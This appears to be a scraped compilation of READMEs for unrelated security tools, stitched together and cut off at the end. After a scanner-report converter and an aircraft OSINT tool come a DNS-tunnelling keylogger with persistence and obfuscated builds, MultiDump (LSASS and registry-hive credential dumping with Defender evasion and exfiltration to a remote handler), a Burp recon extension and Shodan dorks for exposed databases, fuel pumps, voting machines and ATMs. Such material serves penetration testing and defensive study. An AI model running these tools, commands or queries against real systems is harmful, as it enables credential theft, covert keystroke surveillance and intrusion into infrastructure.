-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the outpu t XLSX file (e.g. output.xlsx). Only
for Nessus at the moment
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).

specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.

Example

A few examples

Nessus

To produce an XLSX format:

$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --nessus example/nessus.nessus
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| host | port | plugin id | plugin name | severity | annotations |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |
| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+

Or to output a CSV file:

$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations
192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,44 5,57608,SMB Signing not required,2,X

Nmap

To produce an XLSX format:

$ sr2t --nmap example/nmap.xml -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| 192.168.23.78 | X | | X | X | X | X | X | X | | |
| 192.168.27.243 | | | | X | X | | X | X | X | X |
| 192.168.99.164 | | | | X | X | | X | X | X | X |
| 192.168.228.211 | | X | | | | | | | | |
| 192.168.171.74 | | | | X | X | | X | X | X | X |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+

Nmap Services:
+-----------------+------+-------+---------------+-------+
| ip address | port | proto | service | state |
+--------------- --+------+-------+---------------+-------+
| 192.168.23.78 | 53 | tcp | domain | open |
| 192.168.23.78 | 88 | tcp | kerberos-sec | open |
| 192.168.23.78 | 135 | tcp | msrpc | open |
| 192.168.23.78 | 139 | tcp | netbios-ssn | open |
| 192.168.23.78 | 389 | tcp | ldap | open |
| 192.168.23.78 | 445 | tcp | microsoft-ds | open |
| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 135 | tcp | msrpc | open |
| 192.168.27.243 | 139 | tcp | netbios-ssn | open |
| 192.168.27.243 | 445 | tcp | microsoft-ds | open |
| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 5800 | tcp | vnc-http | open |
| 192.168.27.243 | 5900 | tcp | vnc | open |
| 192.168.99.164 | 135 | tcp | msrpc | open |
| 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192 .168.99.164 | 445 | tcp | microsoft-ds | open |
| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
| 192.168.99.164 | 5800 | tcp | vnc-http | open |
| 192.168.99.164 | 5900 | tcp | vnc | open |
| 192.168.228.211 | 80 | tcp | http | open |
| 192.168.171.74 | 135 | tcp | msrpc | open |
| 192.168.171.74 | 139 | tcp | netbios-ssn | open |
| 192.168.171.74 | 445 | tcp | microsoft-ds | open |
| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
| 192.168.171.74 | 5800 | tcp | vnc-http | open |
| 192.168.171.74 | 5900 | tcp | vnc | open |
+-----------------+------+-------+---------------+-------+

Or to output a CSV file:

$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900
192.168.23.78,X,,X,X,X,X,X,X,,
192.168.27.243,,,,X,X,,X,X,X,X
192.168.99.164,,,,X,X,,X,X,X,X
192.168.228.211,,X,,,,,,,,
192.168.171.74,,,,X,X,,X,X,X,X

Nikto

To produce an XLSX format:

$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx

To produce an text tabular format to stdout:

$ sr2t --nikto example/nikto.xml
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| target ip | target hostname | target port | description | annotations |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10 | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
| | | | render the content of the site in a different fashion to the MIME type | |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+

Or to output a CSV file:

$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations
192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X
192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X

Dirble

To produce an XLSX format:

$ sr2t --dirble example/dirble.xml -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --dirble example/dirble.xml
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| http://example.org/flv | 0 | 0 | false | false | false | | X |
| http://example.org/hire | 0 | 0 | false | false | false | | X |
| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order | 0 | 0 | false | false | fa lse | | X |
| http://example.org/putty | 0 | 0 | false | false | false | | X |
| http://example.org/receipts | 0 | 0 | false | false | false | | X |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+

Or to output a CSV file:

$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations
http://example.org/flv,0,0,false,false,false,,X
http://example.org/hire,0,0,false,false,false,,X
http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
http://example.org/print_order,0,0,false,false,false,,X
http://example.org/putty,0,0,false,false,false,,X
http://example.org/receipts,0,0,false,false,false,,X

Testssl

To produce an XLSX format:

$ sr2t --testssl example/testssl.json -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --testssl example/testssl.json
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+

Or to output a CSV file:

$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X

Fortify

To produce an XLSX format:

$ sr2t --fortify example/fortify.fpr -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --fortify example/fortify.fpr
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| | type | subtype | severity | confidence | annotations |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Inse cure Transport | 3.0 | 5.0 | X |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+

Or to output a CSV file:

$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
,type,subtype,severity,confidence,annotations
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X

Donate

  • WOW: WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp


Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject — in this case planes!

Aircraft Information

  • Tail Number 🛫
  • Aircraft Type ⚙️
  • ICAO24 Designation 🔎
  • Manufacturer Details 🛠
  • Flight Logs 📄
  • Aircraft Owner ✈️
  • Model 🛩
  • Much more!

Usage

To run skytrack on your machine, follow the steps below:

$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py

skytrack works best for Python version 3.

Preview

Features

skytrack features three main functions for aircraft information

gathering and display options. They include the following:

Aircraft Reconnaissance & OSINT

skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

PDF Aircraft Information Report

skytrack also enables you the save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"

Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft

reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

Further Explanation

ICAO and Tail Numbers follow a mapping system like the following:

ICAO address N-Number (Tail Number)

a00001 N1

a00002 N1A

a00003 N1AA

You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

:warning: Converter only works for USA-registered aircraft

Data Sources & APIs Used

ICAO Aircraft Type Designators Listings

FlightAware

Wikipedia

Aviation Safety Website

Jet Photos Website

OpenSky API

Aviation Weather METAR

Airport Codes Dataset

Contributing

skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

Upcoming

  • Obtain Latest Flown Airports
  • Obtain Airport Information
  • Obtain ATC Frequency Information

Support

If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

To check out my other works, visit my GitHub profile.



DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes


This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

These tools excel at lightweight exfiltration and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.


Server

Setup

The server uses python3.

To install dependencies, run python3 -m pip install -r requirements.txt

Starting the Server

To start the server, run python3 main.py

usage: dns exfiltration server [-h] [-p PORT] ip domain

positional arguments:
ip
domain

options:
-h, --help show this help message and exit
-p PORT, --port PORT port to listen on

By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

domain is the domain to listen for, which should be the domain that the server is authoritative for.

Registrar

On the registrar, you want to change your domain's namespace to custom DNS.

Point them to two domains, ns1.example.com and ns2.example.com.

Add records that make point the namespace domains to your exfiltration server's IP address.

This is the same as setting glue records.

Client

Linux

The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.

logger.sh

# Usage: logger.sh [-options] domain
# Positional Arguments:
# domain: the domain to send data to
# Options:
# -p path: give path to log file to listen to
# -l: run the logger with warnings and errors printed

To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

The -l option will show warnings and errors. Can be useful for debugging.

logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistance, you can add the command to .profile to start on every new interactive shell.

connection.sh

Usage: command [-options] domain
Positional Arguments:
domain: the domain to send data to
Options:
-n: number of characters to store before sending a packet

Windows

Build

To build keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output to a file named logger.exe in the build directory.

make production domain=example.com

You can also choose to build the program with debugging by making the debug target.

make debug domain=example.com

For both targets, you will need to specify the domain the server is listening for.

Sending Test Requests

You can use dig to send requests to the server:

dig @127.0.0.1 a.1.1.1.example.com A +short send a connection request to a server on localhost.

dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short send a test message to localhost.

Replace example.com with the domain the server is listening for.

Protocol

Starting a Connection

A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

The server will respond with an IP address in following format: 123.123.123.[id]

Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

Exfiltrating Data

A record requests starting with b indicate exfiltrated data being sent to the server.

The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

The server will respond with [code].123.123.123

id is the id that was established on connection. Data is sent as ASCII encoded in hex.

code is one of the codes described below.

Response Codes

200: OK

If the client sends a request that is processed normally, the server will respond with code 200.

201: Malformed Record Requests

If the client sends an malformed record request, the server will respond with code 201.

202: Non-Existant Connections

If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

203: Out of Order Packets

If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

204 Reached Max Connection

If the client attempts to create a connection when the max has reached, the server will respond with code 204.

Dropped Packets

Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.

Side Notes

Linux

Log File

The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.

Non-Interactive Shells

The keylogger relies on script, so the keylogger won't run in non-interactive shells.

Windows

Repeated Requests

For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process it fine because it discards repeated packets.



MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly


MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

Blog post: https://xre0us.io/posts/multidump


MultiDump supports LSASS dump via ProcDump.exe or comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.

Usage

    __  __       _ _   _ _____
| \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
| |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
| | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
|_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
|_|

Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

-p Path to save procdump.exe, use full path. Default to temp directory
-l Path to save encrypted dump file, use full path. Default to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and use it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase interval between connections to for slower network speeds
-v Enable v erbose mode

MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
Examples:
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

Handler for RemoteProcDump

options:
-h, --help show this help message and exit
-r REMOTE, --remote REMOTE
Port to receive remote dump file
-l LOCAL, --local LOCAL
Local dump file, key needed to decrypt
--sam SAM Local SAM save, key needed to decrypt
--security SECURITY Local SECURITY save, key needed to decrypt
--system SYSTEM Local SYSTEM save, key needed to decrypt
-k KEY, --key KEY Key to decrypt local file
--override-ip OVERRIDE_IP
Manually specify the IP address for key generation in remote mode, for proxied connection

As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.

The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.

By default, MultiDump uses the Comsvc.dll method and saves the encrypted dump in the current directory.

MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

If --procdump is used, ProcDump.exe will be writtern to disk to dump LSASS.

In remote mode, MultiDump connects to the handler's listener.

./ProcDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001

The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.

An additional option to dump the SAM, SECURITY and SYSTEM hives are available with --reg, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.

Building MultiDump

Open in Visual Studio, build in Release mode.

Customising MultiDump

It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.

Self deletion can be toggled by uncommenting the following line in Common.h:

#define SELF_DELETION

To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

//#define DEBUG

MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/

Credits



GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist


This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.


TL;DR

Installation

  1. Visit Jython Offical Site, and download the latest stand alone JAR file, e.g. jython-standalone-2.7.3.jar.
  2. Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
  3. On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
  4. Download the GAP.py and requirements.txt from this project and place in the same directory.
  5. Install Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
  6. Go to the Extensions -> Installed and click Add under Burp Extensions.
  7. Select Extension type of Python and select the GAP.py file.

Using

  1. Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP:

Or you can right click a request or response in any other context and select GAP from the Extensions menu.

  1. Then go to the GAP tab to see the results:

IMPORTANT Notes

If you don't need one of the modes, then un-check it as results will be quicker.

If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two target in the Site Map view at a time, as huge projects can have consume a lot of resources.

If you want to run GAP on one of more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.

It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl button and click the GAP logo header image to remove it to make more space.

The Words mode uses the beautifulsoup4 library and this can be quite slow, so be patient!

In Depth Instructions

Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.

NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.

TODO

  • Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
  • Add an option to not add the Tentaive Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).
  • Improve performance of the link finding regular expressions.
  • Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
  • Deal with other size displays and font sizes better to make sure all controls are viewable.
  • If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
  • Use an alternative to beautifulsoup4 that is faster to parse responses for Words.

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)

🤘 /XNL-h4ck3r



Shodan Dorks


Shodan Dorks by twitter.com/lothos612

Feel free to make suggestions


Shodan Dorks

Basic Shodan Filters

city:

Find devices in a particular city. city:"Bangalore"

country:

Find devices in a particular country. country:"IN"

geo:

Find devices by giving geographical coordinates. geo:"56.913055,118.250862"

Location

country:us country:ru country:de city:chicago

hostname:

Find devices matching the hostname. server: "gws" hostname:"google" hostname:example.com -hostname:subdomain.example.com hostname:example.com,example.org

net:

Find devices based on an IP address or /x CIDR. net:210.214.0.0/16

Organization

org:microsoft org:"United States Department"

Autonomous System Number (ASN)

asn:ASxxxx

os:

Find devices based on operating system. os:"windows 7"

port:

Find devices based on open ports. proftpd port:21

before/after:

Find devices before or after between a given time. apache after:22/02/2009 before:14/3/2010

SSL/TLS Certificates

Self signed certificates ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com

Expired certificates ssl.cert.expired:true

ssl.cert.subject.cn:example.com

Device Type

device:firewall device:router device:wap device:webcam device:media device:"broadband router" device:pbx device:printer device:switch device:storage device:specialized device:phone device:"voip" device:"voip phone" device:"voip adaptor" device:"load balancer" device:"print server" device:terminal device:remote device:telecom device:power device:proxy device:pda device:bridge

Operating System

os:"windows 7" os:"windows server 2012" os:"linux 3.x"

Product

product:apache product:nginx product:android product:chromecast

Customer Premises Equipment (CPE)

cpe:apple cpe:microsoft cpe:nginx cpe:cisco

Server

server: nginx server: apache server: microsoft server: cisco-ios

ssh fingerprints

dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0

Web

Pulse Secure

http.html:/dana-na

PEM Certificates

http.title:"Index of /" http.html:".pem"

Tor / Dark Web sites

onion-location

Databases

MySQL

"product:MySQL" mysql port:"3306"

MongoDB

"product:MongoDB" mongodb port:27017

Fully open MongoDBs

"MongoDB Server Information { "metrics":" "Set-Cookie: mongo-express=" "200 OK" "MongoDB Server Information" port:27017 -authentication

Kibana dashboards without authentication

kibana content-legth:217

elastic

port:9200 json port:"9200" all:elastic port:"9200" all:"elastic indices"

Memcached

"product:Memcached"

CouchDB

"product:CouchDB" port:"5984"+Server: "CouchDB/2.1.0"

PostgreSQL

"port:5432 PostgreSQL"

Riak

"port:8087 Riak"

Redis

"product:Redis"

Cassandra

"product:Cassandra"

Industrial Control Systems

Samsung Electronic Billboards

"Server: Prismview Player"

Gas Station Pump Controllers

"in-tank inventory" port:10001

Fuel Pumps connected to internet:

No auth required to access CLI terminal. "privileged command" GET

Automatic License Plate Readers

P372 "ANPR enabled"

Traffic Light Controllers / Red Light Cameras

mikrotik streetlight

Voting Machines in the United States

"voter system serial" country:US

Open ATM:

May allow for ATM Access availability NCR Port:"161"

Telcos Running Cisco Lawful Intercept Wiretaps

"Cisco IOS" "ADVIPSERVICESK9_LI-M"

Prison Pay Phones

